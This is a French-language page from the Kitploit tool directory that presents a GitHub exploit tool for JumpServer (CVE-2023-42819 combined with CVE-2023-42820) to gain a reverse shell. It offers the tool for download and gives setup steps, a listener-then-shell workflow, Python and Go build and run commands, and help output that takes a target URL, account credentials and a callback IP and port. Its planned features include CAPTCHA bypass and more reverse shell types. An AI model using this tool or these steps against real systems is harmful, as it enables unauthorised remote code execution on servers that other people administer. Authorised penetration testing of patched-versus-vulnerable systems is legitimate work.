Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-42819 — CVE-2023-42819 | Kitploit
Outils/GitHubGitHub/c1ph3rx13/cve-2023-42819
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'Intrusion
GitHubc1ph3rx13/cve-2023-42819

CVE-2023-42819

CVE-2023-42819

Voir le dépôt
631il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-42819

CVE-2023-42819

Description de la vulnérabilité

Vulnérabilité d'écriture de fichier arbitraire dans JumpServer

CVE-2023-42819 + CVE-2023-42820 = GetShell

UTILISATION

  1. Placer le script et les fichiers nécessaires dans le même répertoire

  2. Vérifier que Google Chrome est installé et obtenir son numéro de version

root@kitploit:~
reg query "HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon" /v version
  1. Télécharger le chromedriver correspondant à la version de Google Chrome et au système, puis le placer dans le dossier webdriver

    Dernière version : https://googlechromelabs.github.io/chrome-for-testing/

    Versions antérieures : https://chromedriver.chromium.org/downloads/version-selection

    Que d'exigences : (

  2. Écouter l'IP et le Port correspondants, attendre le reverse shell

Version Python

root@kitploit:~
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝

                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: 代码仅供学习使用,请勿用于其他用途

usage: CVE-2023-42819-Fin.py [-h] -t TARGET -u USERNAME -p PASSWORD --ip IP --port PORT [--proxy PROXY]

CVE-2023-42819 by C1ph3rX13.

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target url
  -u USERNAME, --username USERNAME
                        account username
  -p PASSWORD, --password PASSWORD
                        account password
  --ip IP               shell ip
  --port PORT           shell port
  --proxy PROXY         proxy to http://ip:port
Télécharger l’outil

image-1

image-1

Version Go

Build

root@kitploit:~
go mod init CVE-2023-42819
go mod tidy
go build -ldflags="-s -w" -trimpath

Run

root@kitploit:~
.\CVE-2023-42819.exe -t http://IP:Port -u username -p password -ip IP -port Port -proxy proxyUrl
             

        ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗  
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
        ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝  
                                                                                                                
    @Auth: C1ph3rX13                                                                                            
    @Blog: https://c1ph3rx13.github.io                                                                          
    @Note: 代码仅供学习使用,请勿用于其他用途                                                                   

Usage of CVE-2023-42819.exe:
  -ip string                                                                  
        Shell IP
  -p string
        Account Password
  -port string
        Shell Port
  -proxy string
        Proxy Url
  -t string
        Target Url
  -u string
        Account Username

image-1

À FAIRE

  • Manière peu élégante de contourner les CORS
  • Réécriture avec httpx
  • Ajout de la fonction EXP
  • Réécriture avec go-resty
  • Contournement du CAPTCHA en cas de mot de passe incorrect lors de la connexion
  • Ajout de types de reverse shell
  • Utilisation du mode headless pour la compatibilité Linux
  • Ajout des proxies http, https, socks
  • CVE-2023-42819 + CVE-2023-42820 GetShell en un clic
  • Autant de flags, peut-être que ça ne sera jamais terminé : (

Maintenance

  • 2023-10-18 Ajout de la détection automatique de contournement de site web - Version Python
  • 2023-10-18 Refactorisation des fonctions client
  • 2023-10-18 Simplification de la logique d'exécution
  • 2023-10-18 Testé OK sous Linux - Version Go

Avertissement

  1. Cet outil est destiné uniquement aux professionnels de la sécurité effectuant des tests d'intrusion avec une autorisation légale et aux administrateurs réseau effectuant des opérations de maintenance courante. Les utilisateurs peuvent le télécharger, le copier, le diffuser ou l'utiliser à condition d'avoir obtenu une autorisation légale suffisante et sans usage commercial.
  2. Lors de l'utilisation de cet outil, vous devez vous assurer que toutes vos actions sont conformes aux lois et règlements locaux et ne pas utiliser ce logiciel pour des activités contraires aux lois de la République populaire de Chine. Tous les auteurs et contributeurs de cet outil déclinent toute responsabilité en cas d'utilisation non autorisée de cet outil pour des activités illégales.